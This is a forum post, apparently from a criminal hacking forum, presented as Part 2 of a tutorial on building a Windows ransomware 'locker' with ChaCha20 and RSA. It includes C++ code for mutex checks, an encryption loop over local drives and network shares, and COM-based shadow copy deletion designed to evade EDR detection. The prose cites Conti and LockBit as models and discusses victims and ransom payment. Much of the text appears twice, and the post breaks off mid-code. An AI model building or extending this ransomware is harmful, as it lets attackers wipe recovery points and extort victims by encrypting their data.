ChaCha20 + RSA Hybrid File Encryption on Windows Part 2: Designing a Local Locker

Author: REMIO | Source: https://xss.pro

Link to Part 1: https://xss.pro/threads/140627/#post-996636

ChaCha8 Library: https://github.com/RemyQue/ChaCha20-ecrypt-library

Github Link to Part 1 Hybrid Encryption Engine: https://github.com/RemyQue/Hybrid-Encryption-ChaCha-RSA

Github Link to Part 2 Hybrid Encryptor: https://github.com/RemyQue/ChaCha8-RSA-2048-Encryptor

I. Introduction

This walkthrough is intended solely for educational purposes. The encryption demonstration provided is free and open source, and must not be resold or reused for any other purposes. Also be careful not to encrypt your own files; use a sandbox or VM.

A file locker is a deceptively simple program. It launches, recursively encrypts targeted files, then exits. The whole process often completes in minutes, encrypting thousands of files across an entire network before any EDR can respond. However, beneath this surface level simplicity should lie a well balanced, carefully thought out architecture. The locker must balance high throughput (speed) with system stability (reliability) and evasion capability (stealth). The designer must also take several key elements into consideration when designing a locker: pre-encryption operations, the symmetric cipher, concurrency and parallelism, the asymmetric cipher, local file discovery, network shares, and persistence and execution.

In part one of this walkthrough, we developed a Windows based, multithreaded hybrid encryption engine and corresponding decryptor using the ChaCha20 stream cipher alongside RSA2048. Our primary focus was understanding the core encryption algorithms and implementing the encryption engine, specifically targeting recursive file encryption within a single directory. While this was a crucial first step, a functional encryptor must operate on a much broader scale and include the necessary logic to manage this complexity. As noted earlier, the 2022 Conti Leaks provide an excellent example of a well designed, modular encryptor, one that is both efficient and easily extendable to different environments. By analyzing this architecture, along with subsequent evolutions like LockBit 4 Green, we can gain valuable insights into the mechanics of an encryption engine capable of dynamically handling multiple directories and drives, managing various file types, and incorporating additional features such as process termination or network propagation.

For the purposes of this walkthrough, all EDR countermeasures and obfuscation techniques are omitted. Additionally, any network propagation or encryption features are excluded from the core demonstration. The focus is strictly on implementing local encryption with a robust worker thread model to establish a solid foundation for subsequent development.

II. Designing a Framework

At this stage, before we even start to think about network shares, the next step is to consider how to structure the overall framework and ensure local encryption is working smoothly. With a multithreaded encryptor and decryptor engine already handling files within a single directory, a practical approach is to now separate the threadpool management into its own dedicated class or module. This abstraction allows for better management and extension of threading logic independently from the core encryption functions. Following this, an additional component can be introduced to handle the enumeration of drives and directories by recursively walking through the file system. This module would interact with the threadpool by supplying batches or streams of files from multiple locations for encryption or decryption. Furthermore, one may implement a dedicated shadow copy manager class to locate and remove Volume Shadow Copies via WMI or COM interfaces, ensuring recovery options are disabled prior to encryption. We shall also define some modules for antihooking / EDR countermeasures. Organizing the system into these distinct, modular parts promotes cleaner design and improved maintainability, setting the stage for integrating more advanced features such as compile time obfuscation, userland antihooking, and network propagation in later stages. Let's consider the following structure:

ChaCha8 + RSA-2048 Locker/

- main.cpp: program entry point & control flow

- driveutils.cpp / driveutils.h: drive enumeration & recursive file traversal logic

- encro.cpp / encro.h: core encryption engine functionality (ChaCha20 + RSA)

- shadowcm.cpp / shadowcm.h: shadow copy deletion & cleanup

- threadpool.cpp / threadpool.h: multithreading and task queue management

Now is a good time to think about some crucial pre encryption features our program will need.

III. Our Main Method: main.cpp

This section walks through the WinMain function of the program, detailing its major components: single instance enforcement, shadow copy removal, encryption routines, multithreading setup, and cleanup.

1. Preventing Multiple Instances with a Named Mutex

To avoid double encryption and possible data loss, the program uses a named mutex to detect whether another instance of itself is already running. A mutex (mutual exclusion object) named “Global\\NEWMUTEX” lives in the global namespace, so it is visible system wide. The code creates this named mutex and checks if it already exists:

Early in WinMain(), the program checks for existing instances and exits silently if found:

This mutex mechanism effectively blocks duplicate execution of the program, preventing it from re encrypting files that have already been processed. This ensures that only a single active instance of the application runs across the entire system, avoiding conflicts and redundancies.

2. Check for Prior Encryption

The next step is to check if a previous encryption run has already processed files. The program looks for files with a .enc extension across user and system directories. If enough encrypted files are found, it assumes encryption has already occurred and exits silently:

3. Shadow Copy Removal

Before proceeding with file encryption, the program removes all existing Volume Shadow Copies on the system by calling ShadowCM::RemoveShadowCopies(). This step occurs early in the main function, right after the encrypted files check and before initializing the threading and cryptographic components:

Shadow copies are used by Windows to create point in time snapshots of files, allowing users to recover previous versions through the Previous Versions feature or System Restore. By deleting all shadow copies the program basically eliminates a very common recovery method that could allow for the restoration of files to a pre encryption state without the need for the decryptor.

4. Preparing Encryption Environment

Before the actual file encryption begins, the program performs several crucial preparatory tasks to ensure efficient and secure operation.

Determining Thread Count & Initializing Thread Pool

The main function retrieves the number of CPU cores available on the machine by calling GetSystemInfo(&sysInfo), which fills a SYSTEM_INFO structure. This value is stored in sysInfo.dwNumberOfProcessors and is used to calculate the optimal number of worker threads for concurrent file processing. To optimize performance without overwhelming the system, the program implements specific thread count logic that sets a minimum of 2 threads and caps the maximum at 16 threads:

Once the thread count is determined, the program initializes the global thread pool using ThreadPool_Initialize(&g_threadPool, threadCount). This creates a collection of worker threads ready to execute file encryption tasks in parallel, significantly speeding up the encryption process by utilizing multiple cores effectively. If thread pool initialization fails, the program performs cleanup by closing the global mutex handle (g_hMutex) and exits with error code 1.

Initializing Cryptographic Components

After successfully setting up multithreading, we need to prepare the cryptographic environment through the InitializeCrypto(&cryptoProvider, &publicKey) function. This process involves acquiring a cryptographic provider handle (cryptoProvider) through the Windows CryptoAPI using CryptAcquireContextW, which acts as the interface to underlying cryptographic services such as key generation, encryption, and hashing. The function then loads the hardcoded RSA public key (publicKey) from the embedded g_hardcodedPublicKey byte array using CryptImportKey. Unlike typical encryptors that generate key pairs, we use a predefined, hardcoded public key for consistency and simplicity.

This reflects our initial hybrid cryptographic scheme where each file is encrypted with a unique ChaCha20 symmetric key (fast and efficient for large data), and then that symmetric key is encrypted with the RSA public key (secure key distribution). The GenerateEncryptionKey function creates random 32-byte ChaCha20 keys and 12-byte IVs using CryptGenRandom, then encrypts them with the RSA public key. If cryptographic initialization fails, the program systematically cleans up the thread pool and mutex resources before exiting.

5. Starting Worker Threads

After completing the preparatory tasks, the program starts the worker threads using ThreadPool_Start(&g_threadPool, WorkerThreadProc):

Each worker thread runs the WorkerThreadProc function which continuously processes file encryption tasks from the thread pool queue until the global g_threadPool.running flag is set to false.

6. Drive Prioritization and File Encryption

We enumerate all fixed drives and prioritize them, then process each drive sequentially. To keep the thread queue from becoming overloaded, the program waits for it to drain below 1000 items before moving to the next drive:

7. Network Share Encryption

After processing local drives, we try to encrypt network accessible drives or mapped shares. This function scans for network paths and processes them similarly to local drives:

8. Shutdown and Cleanup

Finally, the program waits for all worker threads to complete their tasks and performs cleanup:

The program waits up to 2 minutes for threads to complete, then gracefully shuts down all threads and cleans up resources including cryptographic handles and the mutex.

Summary

We follow in essence a modular and structured approach true to what we fleshed out: it first ensures only one instance is running via a mutex, then checks for already encrypted files to prevent duplication. It disables recovery by deleting shadow copies, prepares the system with a thread pool for parallel execution, and sets up a secure cryptographic context for file encryption. It then recursively scans local and network drives to locate target files, encrypts them efficiently, and finally cleans up all resources to maintain stealth and stability. And there we are, deceptively simple.

IV. Deleting the Shadow Copies: COM Based VSS Manipulation

Shadow copy removal represents one of the most critical pre encryption operations, as it eliminates one of the primary recovery mechanisms provided through Windows' Volume Shadow Copy Service (VSS). Rather than relying on CLI utilities like vssadmin or wmic (usually monitored by EDR solutions and covered by signatures), we can interact directly with the VSS COM interfaces. This approach provides nice control over the deletion process while maintaining a significantly lower behavioural signature that evades heuristic detection systems (theoretically anyways).

The COM based approach offers several advantages over WMI based deletion. COM provides direct access to native VSS API interfaces, therefore eliminating the abstraction layer and performance overhead associated with WMI queries. This results in faster execution, more reliable enumeration and more precise control over the deletion process. COM interfaces also return structured HRESULT error codes rather than WMI's complex error reporting mechanism, enabling more robust error handling and recovery strategies.

We start with careful COM initialization using the multithreaded apartment model which is essential for VSS operations that can spawn multiple background threads. Security settings are configured with minimal privileges to avoid triggering potential EDRs/AV that will watch for privilege escalation attempts. The authentication level is set to RPC_C_AUTHN_LEVEL_DEFAULT with RPC_C_IMP_LEVEL_IDENTIFY impersonation, providing sufficient access for VSS operations while maintaining a low security profile.

The VSS backup components object serves as the primary interface for all shadow copy operations. By setting the context to VSS_CTX_BACKUP rather than more generic contexts, our program appears as legitimate backup software to monitoring systems. This context selection also ensures compatibility with various shadow copy providers and storage configurations that may be present on enterprise systems.

Shadow copy enumeration is performed through the IVssEnumObject interface, which provides controlled iteration over existing snapshots without the performance penalties associated with repeated WMI queries. The enumeration process collects all snapshot identifiers before beginning deletion operations, preventing modification of the collection during iteration which could lead to missed snapshots or operation failures.

The deletion strategy adapts based on the number of shadow copies detected, implementing different approaches to optimize both speed and stealth. For small numbers of snapshots (three or fewer), the shadowcopy module performs bulk deletion using VSS_OBJECT_SNAPSHOT_SET, which removes entire snapshot sets efficiently in a single operation. This approach minimizes API calls and reduces the operational footprint.

For larger numbers of shadow copies we use randomized batch processing to mimic legitimate backup management behavior. This approach reduces the behavioral signature that could trigger security monitoring systems designed to detect rapid, sequential shadow copy deletion patterns characteristic of malicious software.

The batch processing algorithm implements variable delays between operations, ranging from 10 to 50 milliseconds, to simulate the timing patterns of legitimate administrative tools. This temporal obfuscation helps avoid detection by behavioral analysis systems that monitor for rapid, automated shadow copy deletion sequences. We implement exception handling via standard C++ try/catch blocks rather than overly structured exception handling, ensuring proper object destruction and resource cleanup even when VSS operations encounter unexpected errors. This approach prevents resource leaks that could destabilize the system or leave forensic evidence of the operation.

The COM approach to shadow copy deletion provides superior control, performance, and stealth compared to alternative methods like WMI. By leveraging native VSS interfaces and implementing adaptive deletion strategies, we in essence neutralize one of the primary recovery mechanisms available to victims while minimizing detection risk and system impact.

V. Drive Enumeration and System Preparation: The DriveUtils Module

The drive enumeration & system preparation module handles local storage discovery, drive prioritization and intelligent path filtering for optimal encryption targeting. We basically implement some algorithms for identifying and prioritizing storage devices while maintaining system stability through careful exclusion of critical system directories. The implementation demonstrates how modern lockers balance comprehensive coverage with operational safety, ensuring maximum impact on user data while preserving system functionality necessary for victim interaction.

Drive enumeration (walking) begins with comprehensive discovery of all accessible storage devices using the Windows API’s logical drive detection mechanisms. The encryptor systematically queries the system for all available drive letters, then filters for fixed drives that are most likely to contain valuable user data. This approach ensures complete coverage of local storage while avoiding unreliable or temporary storage types such as network drives, removable and virtual drives that may not be consistently accessible.

Our drive discovery method uses a bitmask approach to enumerate all logical drives present in the system. By testing each potential drive letter against the logical drive mask returned by GetLogicalDrives(), we ensure no fixed storage devices are overlooked. The additional accessibility verification through FindFirstFileW() prevents the inclusion of drives that may be present but inaccessible due to permissions, hardware failures, or other system constraints that could cause encryption operations to fail.

Drive prioritization implements sorting that orders drives by their available free space. Our encryptor prioritizes drives with larger amounts of free space first, operating under the assumption that drives with more available space are likely to contain larger collections of user data. This prioritization strategy maximizes the impact of encryption operations by targeting the most data-rich storage devices during the critical early phases of encryption. It's a standard presumptive technique:

Our prioritization algorithm incorporates strategic system drive deferral, deliberately moving the Windows system drive to the end of the processing queue. This approach minimizes the risk of system instability during the critical early phases of encryption operations and ensures that the locker can complete processing of user data drives before potentially encountering any system related complications that could interrupt or compromise the encryption process.

Free space calculation utilizes the GetDiskFreeSpaceExW() API to obtain accurate disk space information that accounts for user quotas and file system limitations. This approach provides more reliable space calculations than simple file enumeration methods, enabling more accurate drive prioritization decisions based on actual available storage capacity.

System directory exclusion implements comprehensive path filtering that prevents encryption of critical system components while preserving essential system functionality. The exclusion logic identifies and skips Windows system directories, program installation folders, system utilities, and other paths that could destabilize the target system if encrypted. This careful balance ensures that the victim’s system remains functional enough for ransom payment processes while maximizing the impact on user-accessible data.

The exclusion system targets specific directory patterns that are essential for system operation, including the Windows directory containing core system files, Program Files directories containing installed applications, ProgramData containing application data and configurations, the Recycle Bin, and System Volume Information used by the file system for metadata storage. By avoiding these critical paths our encryptor maintains system stability while focusing encryption efforts on user data directories where valuable files are most likely to be stored. There are various better approaches you could take; however, for demonstrative purposes this will work fine.

This approach to drive enumeration and prioritization demonstrates the type of planning and methodical walking required for effective locker operations. By implementing prioritization features and exclusion mechanisms the module ensures a pretty wide coverage of valuable data while maintaining the system stability necessary for successful operations.

VI. Concurrency & Parallel Processing: Improving the Worker Thread Model

The threadpool represents the computational engine that enables higher performance parallel encryption operations across multiple processor cores and large file collections. Our concurrency system implements a producer-consumer pattern with threadsafe queue management, dynamic load balancing and graceful cleanup. The threadpool demonstrates how modern lockers leverage multi core processors to achieve faster encryption speeds that can encrypt thousands of files in minutes, often completing before any EDR can detect and respond to the process.

The threadpool initialization process establishes the foundational infrastructure for parallel processing operations. The implementation dynamically allocates thread handle arrays based on the optimal thread count determined by system hardware analysis, ensuring efficient memory usage across diverse hardware configurations. Critical section objects and semaphore synchronization primitives are initialized to provide thread-safe access to shared resources, preventing race conditions and data corruption that could compromise encryption operations or system stability.

The work queue implementation utilizes a linked list data structure optimized for producer-consumer scenarios typical in file encryption operations. This design enables efficient insertion of new work items at the tail while maintaining fast dequeue operations at the head, minimizing lock contention and maximizing throughput when multiple producer threads are feeding work to multiple consumer threads. The queue maintains accurate count tracking to support load balancing and resource management decisions.

Thread creation and startup procedures implement robust error handling and resource management to ensure consistent threadpool operation across diverse system configurations. Each worker thread receives a unique index parameter that can be used for thread-specific operations or debugging, while comprehensive cleanup procedures handle partial initialization failures that could leave the system in an inconsistent state.

The work queue management system implements thread-safe enqueue and dequeue operations that support high-throughput file processing scenarios. The enqueue operation maintains both head and tail pointers for optimal performance, enabling O(1) insertion operations even when thousands of files are queued for processing. Critical section protection ensures atomic updates to queue state, preventing data corruption during concurrent access by multiple threads.

The dequeue implementation provides efficient work item retrieval for worker threads while maintaining queue integrity under high-concurrency conditions. The first-in-first-out (FIFO) processing order ensures predictable file processing behavior, while atomic pointer updates prevent race conditions that could result in lost work items or memory corruption.

Queue monitoring capabilities enable real time assessment of processing load and system performance. The thread safe queue count function provides accurate work item counts that can be used for load balancing decisions, progress monitoring, and system resource management. This information is crucial for implementing adaptive algorithms that adjust processing behavior based on current system load and available resources.

The shutdown and cleanup procedures implement graceful termination mechanisms that ensure all worker threads complete their current operations before system exit. The shutdown process uses semaphore signaling to wake sleeping threads and allow them to detect the termination condition, while timeout mechanisms prevent indefinite waiting that could prevent proper program termination.

The threadpool architecture enables load balancing and resource management that optimize the encryption performance. By implementing dynamic scaling, efficient queue management, and windows synchronization mechanisms, this system provides the computational foundation necessary for high speed file encryption operations that can process thousands of files in very little time.

VII. Upgrading the Encryption Engine: A Better Local ChaCha20 + RSA Implementation

The core encryption engine represents the evolution from our single directory implementation in Part 1 to a multi drive, multithreaded encryption system capable of processing entire local systems efficiently. Building upon the foundational ChaCha20 + RSA hybrid cryptography established previously, our next implementation will integrate seamlessly with the threadpool, drive enumeration, and system preparation modules to create a comprehensive encryption platform. The engine demonstrates how individual components combine to form a cohesive system that can rapidly encrypt thousands of files across multiple drives while maintaining cryptographic security and operational stealth, and how these techniques can be, and are, leveraged for unsavoury purposes…

Unlike the single directory approach from Part 1, this implementation operates as a producer consumer system where file discovery processes feed work items into a shared threadpool queue, enabling parallel processing across multiple drives simultaneously. The integration with the drive enumeration module allows the encryption engine to process prioritized drive lists, while the threadpool architecture ensures optimal resource utilization across diverse hardware configurations. This modular design enables the encryption engine to scale from single directory operations to enterprise wide deployment scenarios.

The worker thread implementation serves as the core processing unit that consumes work items from the threadpool queue and performs the actual file encryption operations. Each worker thread operates independently, processing files in parallel while sharing cryptographic contexts and system resources efficiently. The implementation includes sophisticated error handling, timeout mechanisms, and resource management to ensure stable operation even when processing thousands of files simultaneously.

The file discovery and queuing system represents a significant advancement from the single directory approach, implementing stack based directory traversal that can efficiently process entire drive hierarchies. This sophisticated algorithm prioritizes user directories, handles extended path lengths, and implements intelligent load balancing to prevent queue overflow while maintaining optimal processing speeds. The integration with the threadpool enables dynamic scaling based on system performance and available resources.

Extended path support addresses the limitations encountered in single-directory implementations when processing deep directory structures or files with long names. The implementation automatically detects path length constraints and converts to extended path format (\\?\) when necessary, ensuring comprehensive file coverage even in complex enterprise directory structures.

The cryptographic implementation builds directly upon the ChaCha20 + RSA hybrid system established in Part 1, but extends it with hardcoded public keys and optimized key generation for multi-threaded environments. This approach eliminates the performance overhead of key generation while ensuring consistent encryption across all worker threads and target systems.

The header only encryption strategy represents an optimization that maintains the cryptographic illusion of full file encryption while dramatically improving processing speed. This approach encrypts only the initial portion of each file, making the file unusable while requiring significantly less computational resources than full file encryption. This enables the locker to process thousands of files in minutes rather than hours.

Our upgraded encryption engine has now evolved from a single directory POC to a system capable of smoothly encrypting an entire local machine. By integrating with the threadpool, drive enumeration, and system preparation modules, we now have a better computational foundation for a more comprehensive file encryptor system.

VIII. Conclusion

In this second part of the walkthrough we successfully expanded the encryption engine into a more robust & modular local file locker framework, designed specifically for Windows environments. By decoupling core responsibilities into their own components, such as recursive drive enumeration utilities, multithreaded task scheduling, encryption core logic with ChaCha20 and RSA2048, and shadow copy management, we established a solid foundation that balances throughput and maintainability.

Upon compiling and running this demonstration, you will find that the implemented threadpool enhances scalability of the encryptor, enabling efficient parallel processing of large file sets across multiple directories while maintaining minimal system impact. The drive enumeration module systematically discovers target files recursively, feeding the encryption system with dynamically generated workloads, which ensures broad and flexible coverage of the filesystem. Meanwhile, the shadow copy deletion module addresses an essential pre encryption operation, neutralizing a common recovery mechanism and thereby increasing the overall effectiveness of the locker.

Together, these modular components demonstrate how to build a much better and more comprehensive local encryption engine that can serve as a basis for more complex functionality in future walkthroughs, making it straightforward to integrate additional capabilities such as advanced EDR evasion, runtime obfuscation, process injection, and network propagation. Looking forward, perhaps we will explore some stealth techniques including better compile time code obfuscation and userland antihooking to evade modern endpoint detection and response systems. Network propagation and persistence mechanisms will also be considered to transform this local encryptor into a fully featured locker capable of lateral movement and sustained presence. However, this foundational framework exemplifies best practices for balancing speed, stealth, and stability in file encryptor development at the local encryption level.

Again, this walkthrough is intended solely for educational purposes. The encryption demonstration provided is free and open source, and must not be resold or reused for any other purposes. Also be careful not to encrypt your own files; use a sandbox or VM.

Thanks for reading

- Remy


| Design element | Considerations |
|---|---|
| Pre-encryption operations | Disabling shadow copies, killing processes holding file handles (e.g. database or backup services), clearing event logs, handling AV/EDR. |
| Symmetric cipher | Used to encrypt files, typically ChaCha20, AES-CTR, or similar. Focus on speed and efficiency on modern CPUs and resource-constrained environments. |
| Concurrency & parallelism | Multithreading and async I/O to speed up encryption across many files or large files while staying stealthy with minimal CPU/memory usage. |
| Asymmetric cipher | Used to encrypt the symmetric key. RSA-2048 is common, but ECC (e.g., Curve25519) may be better for smaller payloads and faster key exchange. |
| Local file discovery | Recursive walk of drives and directories. Target specific file types, avoid system/decoy files, skip small files optionally. |
| Network shares | Enumerate SMB shares, use creds or token impersonation, and deploy via WMI, PsExec, RDP, or GPOs to hit remote systems. |
| Persistence & execution | Use registry autoruns, scheduled tasks, process injection, services, etc. Support command line arguments for flexibility. |

In part one of this walkthrough, we developed a Windows based, multithreaded hybrid encryption engine and corresponding decryptor using the ChaCha20 stream cipher alongside RSA2048. Our primary focus was understanding the core encryption algorithms and implementing the encryption engine, specifically targeting recursive file encryption within a single directory. While this was a crucial first step, a functional encryptor must operate on a much broader scale and include the necessary logic to manage this complexity. As noted earlier, the 2022 Conti Leaks provide an excellent example of a well designed, modular encryptor. One that is both efficient and easily extendable to different environments. By analyzing this architecture, along with subsequent evolutions like LockBit 4 Green, we can gain valuable insights into how one should go about understanding the mechanics of an encryption engine capable of dynamically handling multiple directories and drives, managing various file types, and incorporating additional features such as process termination or network propagation etc.

For the purposes of this walkthrough, all EDR countermeasures and obfuscation techniques are omitted. Additionally, any network propagation or encryption features are excluded from the core demonstration. The focus is strictly on implementing local encryption with a robust worker thread model to establish a solid foundation for subsequent development.

II. Designing a Framework

At this stage before we even start to think about network shares etc, the next step is to consider how to structure the overall framework and ensure local encryption is working smoothly. With a multithreaded encryptor and decryptor engine already handling files within a single directory, a practical approach is to now separate the threadpool management into its own dedicated class or module. This abstraction allows for better management and extension of threading logic independently from the core encryption functions. Following this, an additional component can be introduced to handle the enumeration of drives and directories by recursively walking through the file system. This module would interact with the threadpool by supplying batches or streams of files from multiple locations for encryption or decryption. Furthermore, one may implement a dedicated shadow copy manager class to locate and remove Volume Shadow Copies via WMI or COM interfaces, ensuring recovery options are disabled prior to encryption. We shall also define some modules for antihooking / EDR countermeasures. Organizing the system into these distinct, modular parts promotes cleaner design and improved maintainability, setting the stage for integrating more advanced features such as compile time obfuscation, userland antihooking, and network propagation in later stages, so lets consider the following structure:

ChaCha8 + RSA-2048 Locker/

- main.cpp: program entry point & control flow

- driveutils.cpp / driveutils.h: drive enumeration & recursive file traversal logic

- encro.cpp / encro.h: core encryption engine functionality (ChaCha20 + RSA)

- shadowcm.cpp / shadowcm.h: shadow copy deletion & cleanup

- threadpool.cpp / threadpool.h: multithreading and task queue management

Now is a good time to think about some crucial pre encryption features our program will need.

III. Our Main Method: main.cpp

This section walks through the WinMain function of the program, detailing its major components: single instance enforcement, shadow copy removal, encryption routines, multithreading setup, and cleanup.

1. Preventing Multiple Instances with a Named Mutex

To avoid double encryption and possible data loss the program uses a named mutex to detect if another instance of itself is already running. A mutex (mutual exclusion) named “Global\\NEWMUTEX” is shared system wide exclusion. The code creates this named mutex and checks if it already exists:

C++:

HANDLE g_hMutex = NULL;

BOOL IsAlreadyRunning() {

g_hMutex = CreateMutexW(NULL, TRUE, L”Global\\NEWMUTEX”);

if (g_hMutex == NULL || GetLastError() == ERROR_ALREADY_EXISTS) {

if (g_hMutex) CloseHandle(g_hMutex);

return TRUE;

}

return FALSE;

}

C++:

if (IsAlreadyRunning()) {

return 0;

}2. Check for Prior Encryption

The next step is to check if a previous encryption run has already processed files. The program looks for files with a .enc extension across user and system directories. If enough encrypted files are found, it assumes encryption has already occurred and exits silently.:

C++:

#ifndef _DEBUG

if (HasEncryptedFiles()) {

if (g_hMutex) CloseHandle(g_hMutex);

return 0;

}

#endif3. Shadow Copy Removal

Before proceeding with file encryption, the program removes all existing Volume Shadow Copies on the system by calling ShadowCM::RemoveShadowCopies(). This step occurs early in the main function, right after the encrypted files check and before initializing the threading and cryptographic components:

C++:

// Remove all shadow copies - added functionality

ShadowCM::RemoveShadowCopies();4. Preparing Encryption Environment

Before the actual file encryption begins, the program performs several crucial preparatory tasks to ensure efficient and secure operation.

Determining Thread Count & Initializing Thread Pool

The main function retrieves the number of CPU cores available on the machine by calling GetSystemInfo(&sysInfo), which fills a SYSTEM_INFO structure. This value is stored in sysInfo.dwNumberOfProcessors and is used to calculate the optimal number of worker threads for concurrent file processing. To optimize performance without overwhelming the system, the program implements specific thread count logic that sets a minimum of 2 threads and caps the maximum at 16 threads:

C++:

DWORD threadCount = sysInfo.dwNumberOfProcessors;

if (threadCount < 2) threadCount = 2; // Minimum 2 threads

if (threadCount > 16) threadCount = 16; // Maximum 16 threadsInitializing Cryptographic Components

After successfully setting up multithreading, we need to prepare the cryptographic environment through the InitializeCrypto(&cryptoProvider, &publicKey) function. This process involves acquiring a cryptographic provider handle (cryptoProvider) through the Windows CryptoAPI using CryptAcquireContextW, which acts as the interface to underlying cryptographic services such as key generation, encryption, and hashing. The function then loads the hardcoded RSA public key (publicKey) from the embedded g_hardcodedPublicKey byte array using CryptImportKey. Unlike typical encryptors that generate key pairs, we use a pre-defined / hardcoded public key for consistent encryption across for simplicity.

This reflects our initial hybrid cryptographic scheme where each file is encrypted with a unique ChaCha20 symmetric key (fast and efficient for large data), and then that symmetric key is encrypted with the RSA public key (secure key distribution). The GenerateEncryptionKey function creates random 32-byte ChaCha20 keys and 12-byte IVs using CryptGenRandom, then encrypts them with the RSA public key. If cryptographic initialization fails, the program systematically cleans up the thread pool and mutex resources before exiting.

5. Starting Worker Threads

After completing the preparatory tasks, the program starts the worker threads using ThreadPool_Start(&g_threadPool, WorkerThreadProc):

C++:

if (!ThreadPool_Start(&g_threadPool, WorkerThreadProc)) {

CleanupCrypto(cryptoProvider, publicKey);

ThreadPool_Cleanup(&g_threadPool);

if (g_hMutex) CloseHandle(g_hMutex);

return 1;

}6. Drive Prioritization and File Encryption

We enumerate all fixed drives and prioritizes them for encryption processing before processing each drive sequentially, ensuring the thread queue doesn’t become overloaded by waiting for it to drain below 1000 items before moving to the next drive:

C++:

// Get all fixed drives

std::vector<std::wstring> drives = GetFixedDrives();

std::vector<std::wstring> prioritizedDrives = PrioritizeDrives(drives);

// Loop through each drive and encrypt files

for (const auto& drive : prioritizedDrives) {

wcscpy_s(g_currentDrive, 4, drive.c_str());

g_currentlyProcessingDrive = TRUE;

FindAndEncryptFiles(drive.c_str(), cryptoProvider, publicKey);

// Wait for thread queue to drain

ULONGLONG waitStartTime = GetTickCount64();

ULONGLONG waitElapsedTime = 0;

const DWORD MAX_DRIVE_WAIT_TIME = 60000;

while (ThreadPool_GetQueueCount(&g_threadPool) > 1000 && waitElapsedTime < MAX_DRIVE_WAIT_TIME) {

Sleep(1000);

waitElapsedTime = GetTickCount64() - waitStartTime;

}

g_currentlyProcessingDrive = FALSE;

}After processing local drives, we try to encrypt network accessible drives or mapped shares. This function scans for network paths and processes them similarly to local drives:

C++:

nscan::EncryptNetworkShares();Finally, the program waits for all worker threads to complete their tasks and performs cleanup:

C++:

// Wait for threads to finish

ULONGLONG waitTime = 120000;

ULONGLONG startTime = GetTickCount64();

ULONGLONG elapsedTime = 0;

while (ThreadPool_GetQueueCount(&g_threadPool) > 0 && elapsedTime < waitTime) {

Sleep(1000);

elapsedTime = GetTickCount64() - startTime;

}

// Shutdown thread pool

ThreadPool_Shutdown(&g_threadPool, 5000);

ThreadPool_Cleanup(&g_threadPool);

// Cleanup crypto context

CleanupCrypto(cryptoProvider, publicKey);

// Release mutex

if (g_hMutex) CloseHandle(g_hMutex);Summary

We follow in essence a modular and structured approach true to what we fleshed out: it first ensures only one instance is running via a mutex, then checks for already encrypted files to prevent duplication. It disables recovery by deleting shadow copies, prepares the system with a thread pool for parallel execution, and sets up a secure cryptographic context for file encryption. It then recursively scans local and network drives to locate target files, encrypts them efficiently, and finally cleans up all resources to maintain stealth and stability. And there we are, deceptively simple.

IV. Deleting the Shadow Copies: COM Based VSS Manipulation

Shadow copy removal represents one of the most critical pre encryption operations as it eliminates one of the primary recovery mechanism through Windows' Volume Shadow Copy Service (VSS). Rather than relying on CLI utilities like vssadmin or wmic (usually monitored EDR solutions / giving signatures...), we can interact directly with the VSS COM interfaces. This approach provides nice control over the deletion process while maintaining a significantly lower behavioural signature that evades heuristic detection systems (theoretically anyways).

The COM type approach offers several advantages over WMI based deletion. COM provides direct access to native VSS API interfaces, therefore eliminating the abstraction layer and performance overhead associated with WMI queries. This results in faster execution, more reliable enumeration and more precise control over the deletion process. Also COM interfaces return structured HRESULT error codes rather than WMIs complex error reporting mechanism, enabling more robust error handling and recovery strategies.

C++:

// COM initialization with apartment model selection for VSS operations

HRESULT hr = CoInitializeEx(0, COINIT_MULTITHREADED);

if (FAILED(hr) && hr != S_FALSE) {

return false;

}

// Minimal COM security configuration to avoid privilege escalation detection

hr = CoInitializeSecurity(

NULL, -1, NULL, NULL,

RPC_C_AUTHN_LEVEL_DEFAULT,

RPC_C_IMP_LEVEL_IDENTIFY,

NULL, EOAC_NONE, NULL

);

C++:

// Create and initialize VSS backup components with proper context

hr = CreateVssBackupComponents(&pVss);

if (FAILED(hr)) {

CoUninitialize();

return false;

}

hr = pVss->InitializeForBackup();

if (FAILED(hr)) {

pVss->Release();

CoUninitialize();

return false;

}

// Set VSS context to backup rather than generic operations

hr = pVss->SetContext(VSS_CTX_BACKUP);

if (FAILED(hr)) {

pVss->Release();

CoUninitialize();

return false;

}Shadow copy enumeration is performed through the IVssEnumObject interface, which provides controlled iteration over existing snapshots without the performance penalties associated with repeated WMI queries. The enumeration process collects all snapshot identifiers before beginning deletion operations, preventing modification of the collection during iteration which could lead to missed snapshots or operation failures.

C++:

// Comprehensive shadow copy enumeration with safe collection

hr = pVss->Query(GUID_NULL, VSS_OBJECT_NONE, VSS_OBJECT_SNAPSHOT, &pEnum);

if (FAILED(hr) || pEnum == nullptr) {

if (pVss) pVss->Release();

CoUninitialize();

return false;

}

std::vector<VSS_ID> snapshotIds;

VSS_OBJECT_PROP prop;

ULONG fetched;

// Collect all snapshot IDs before deletion to avoid enumeration issues

ZeroMemory(&prop, sizeof(prop));

while (pEnum->Next(1, &prop, &fetched) == S_OK && fetched == 1) {

if (prop.Type == VSS_OBJECT_SNAPSHOT) {

snapshotIds.push_back(prop.Obj.Snap.m_SnapshotId);

}

ZeroMemory(&prop, sizeof(prop)); // Clear for next iteration

}

C++:

// Adaptive deletion strategy based on snapshot count

if (snapshotIds.size() <= 3) {

// Small count: bulk deletion for maximum speed

LONG deletedSnapshots = 0;

VSS_ID nonDeletedSnapshotsId = GUID_NULL;

hr = pVss->DeleteSnapshots(

GUID_NULL, // Delete all shadow copies

VSS_OBJECT_SNAPSHOT_SET, // Delete entire snapshot sets

FALSE, // Non-forced deletion appears legitimate

&deletedSnapshots,

&nonDeletedSnapshotsId

);

success = SUCCEEDED(hr) && deletedSnapshots > 0;

}

C++:

// Large count: randomized batch processing for stealth

else {

// Randomize deletion order to avoid predictable patterns

std::random_device rd;

std::mt19937 g(rd());

std::shuffle(snapshotIds.begin(), snapshotIds.end(), g);

const size_t BATCH_SIZE = 3;

for (size_t i = 0; i < snapshotIds.size(); i += BATCH_SIZE) {

size_t batchEnd = i + BATCH_SIZE;

if (batchEnd > snapshotIds.size()) {

batchEnd = snapshotIds.size();

}

// Process individual snapshots in the current batch

for (size_t j = i; j < batchEnd; j++) {

LONG deletedSnapshots = 0;

VSS_ID nonDeletedSnapshotsId = GUID_NULL;

hr = pVss->DeleteSnapshots(

snapshotIds[j], // Individual snapshot ID

VSS_OBJECT_SNAPSHOT, // Single snapshot deletion

